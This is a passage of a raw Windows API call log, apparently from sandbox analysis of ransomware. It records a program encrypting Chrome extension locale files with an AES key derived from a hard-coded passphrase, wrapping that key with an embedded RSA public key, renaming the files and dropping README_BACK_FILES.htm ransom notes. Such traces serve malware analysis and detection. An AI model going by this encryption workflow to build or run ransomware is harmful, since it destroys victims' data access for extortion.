KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.764] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.764] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13900) returned 1 [0256.764] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13900, dwCertEncodingType=0x1, pInfo=0x2e2a8c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a8f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a8f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e194e8) returned 1 [0256.764] CryptEncrypt (in: hKey=0x2e194e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.764] CryptEncrypt (in: hKey=0x2e194e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13e50*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e13e50*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.764] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e13e50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e13e50*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.766] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xa7, lpOverlapped=0x0) returned 1 [0256.767] CryptEncrypt (in: hKey=0x2e191e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xa7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0256.767] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0256.767] CloseHandle (hObject=0x5d60) returned 1 [0256.767] CloseHandle (hObject=0x5d5c) returned 1 [0256.768] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json"), bFailIfExists=0) returned 1 [0256.771] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json", dwFileAttributes=0x0) returned 1 [0256.771] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.gsg")) returned 1 [0256.773] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.fuck")) returned 1 [0256.774] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.774] CryptDestroyKey (hKey=0x2e191e8) returned 1 [0256.774] CryptReleaseContext (hProv=0x2e13878, dwFlags=0x0) returned 1 [0256.774] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.774] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.774] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\readme_back_files.htm")) returned 0xffffffff [0256.774] AreFileApisANSI () returned 1 [0256.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.774] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.775] GetFileType (hFile=0x5d50) returned 0x1 [0256.775] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.778] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.778] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.778] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.778] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.778] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.779] GetLastError () returned 0x0 [0256.779] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json")) returned 0x20 [0256.779] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0256.779] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.780] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.780] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.781] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13f60) returned 1 [0256.783] CryptCreateHash (in: hProv=0x2e13f60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.783] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.783] CryptHashData (hHash=0x2e18128, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.783] CryptDeriveKey (in: hProv=0x2e13f60, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19328) returned 1 [0256.784] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.784] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.784] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13878) returned 1 [0256.784] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13878, dwCertEncodingType=0x1, pInfo=0x2e2bd10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2bd40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2bd48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e197a8) returned 1 [0256.784] CryptEncrypt (in: hKey=0x2e197a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.784] CryptEncrypt (in: hKey=0x2e197a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14180*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14180*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.784] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e14180*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14180*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.785] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x114, lpOverlapped=0x0) returned 1 [0256.787] CryptEncrypt (in: hKey=0x2e19328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x114, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0256.787] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0256.787] CloseHandle (hObject=0x5d5c) returned 1 [0256.787] CloseHandle (hObject=0x5d60) returned 1 [0256.787] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0256.790] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0256.791] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.gsg")) returned 1 [0256.792] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\messages.json.fuck")) returned 1 [0256.793] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.793] CryptDestroyKey (hKey=0x2e19328) returned 1 [0256.793] CryptReleaseContext (hProv=0x2e13f60, dwFlags=0x0) returned 1 [0256.794] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.794] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.794] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0256.794] AreFileApisANSI () returned 1 [0256.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.794] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.795] GetFileType (hFile=0x5d50) returned 0x1 [0256.795] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.796] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.796] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.796] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.796] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.796] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.796] GetLastError () returned 0x0 [0256.797] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json")) returned 0x20 [0256.799] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json", dwFileAttributes=0x80) returned 1 [0256.800] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.800] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.802] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.802] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e134c0) returned 1 [0256.804] CryptCreateHash (in: hProv=0x2e134c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.804] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.804] CryptHashData (hHash=0x2e18128, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.804] CryptDeriveKey (in: hProv=0x2e134c0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19428) returned 1 [0256.804] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.804] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.804] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13c30) returned 1 [0256.805] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13c30, dwCertEncodingType=0x1, pInfo=0x2e2bde0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2be10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2be18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e191e8) returned 1 [0256.805] CryptEncrypt (in: hKey=0x2e191e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.805] CryptEncrypt (in: hKey=0x2e191e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13548*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e13548*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.805] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e13548*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e13548*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.806] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x14b, lpOverlapped=0x0) returned 1 [0256.808] CryptEncrypt (in: hKey=0x2e19428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x14b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0256.808] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0256.808] CloseHandle (hObject=0x5d60) returned 1 [0256.808] CloseHandle (hObject=0x5d5c) returned 1 [0256.808] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.gsg"), 